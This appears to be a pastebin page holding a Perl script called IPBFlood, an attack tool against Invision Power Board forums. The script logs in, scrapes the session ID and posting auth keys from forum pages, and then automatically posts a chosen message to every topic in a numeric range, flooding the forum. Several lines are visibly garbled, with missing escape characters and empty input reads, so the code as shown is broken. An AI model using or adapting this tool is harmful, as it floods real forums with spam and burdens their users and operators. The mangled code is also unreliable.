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a guest
Jun 13th, 2017
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Perl 2.03 KB | None | 0 0
  1. #!/usr/bin/perl -w
  2. use strict;
  3. use LWP::UserAgent;
  4. use HTTP::Cookies;
  5. my $url = undef;
  6. my $login = "act=Login&CODE=01";
  7. my $UserName = undef;
  8. my $PassWord = undef;
  9. my $CookieDate = 1;
  10. my $SID = undef;
  11. my $SE = undef;
  12. my $MSG = undef;
  13. sub IPBFlood($);
  14. print "ttWelcome to IPBFlood 0.1x By Souviktt[ 'NikTrix' ]Team";
  15. print "Urlt: ";chomp($url=);
  16. print "UserNamet: ";chomp($UserName=);
  17. print "Passwordt: ";chomp($PassWord=);
  18. print "Start [to] Endt: ";chomp($SE=);
  19. print "Messaget: ";chomp($MSG=);
  20. my $ua = LWP::UserAgent->new;
  21. $ua->agent("Mozilla/4.0");
  22. my $cj = HTTP::Cookies->new(file => "N/A" , autosave => 0);
  23. $ua->cookie_jar($cj);
  24. my $r = $ua->get($url);
  25. if($r->is_success){
  26. ($SID) = $r->content =~/?s=(w{32})&.*/i;
  27. print "SID : $SID";
  28. }
  29. $r = $ua->post($url.$login,[UserName=> $UserName ,PassWord => $PassWord ,CookieDate =>$CookieDate , s => $SID]);
  30. if($r->is_success){
  31. print "[+] Connected" if($r->content =~ /cliquez ici si vous ne souhaitez pas/gi);
  32. my($Start , $End) = split(/-/,$SE);
  33. foreach($Start..$End){
  34. IPBFlood($_);
  35. }
  36. }
  37. sub IPBFlood($){
  38. my $Topic = shift;
  39. my $get = $ua->get($url."s=$SID&showtopic=$Topic");
  40. if($get->is_success){
  41. if( my ($f) = $get->content =~/f=(d{1,4})/ ){
  42. print "[-]Subforum ID : $f & Topic N : $Topic";
  43. #Get Post AuthKey for Subforum f=N°
  44. $get = $ua->get($url."s=$SID&act=post&do=reply_post&f=$f&t=$Topic");
  45. if($get->is_success){
  46. my ( $auth_key ) = $get->content =~/auth_key.*(w{32})/i;
  47. my ( $attach_post_key ) = $get->content =~/attach_post_key.*(w{32})/i;
  48. print "[-]auth_key : $auth_key[-]attach_post_key : $attach_post_key";
  49. my %form =(st => 0,
  50. act => "Post",
  51. s => "$SID",
  52. f => "$f",
  53. auth_key => "$auth_key",
  54. removeattachid => "0",
  55. CODE => "03",
  56. t => "$Topic",
  57. attach_post_key => "$attach_post_key",
  58. parent_id => "0",
  59. "ed-0_wysiwyg_used"=> "0",
  60. "editor_ids%5B%5D" => "ed-0",
  61. Post => "$MSG",
  62. enableemo => "yes",
  63. enablesig => "yes",
  64. iconid => "0"
  65. );
  66. $r = $ua->post($url."s=$SID",%form);
  67. if($r->is_success){
  68. print "Send success !" if( length($r->content)< 300);
  69. }
  70. }
  71. }
  72. }
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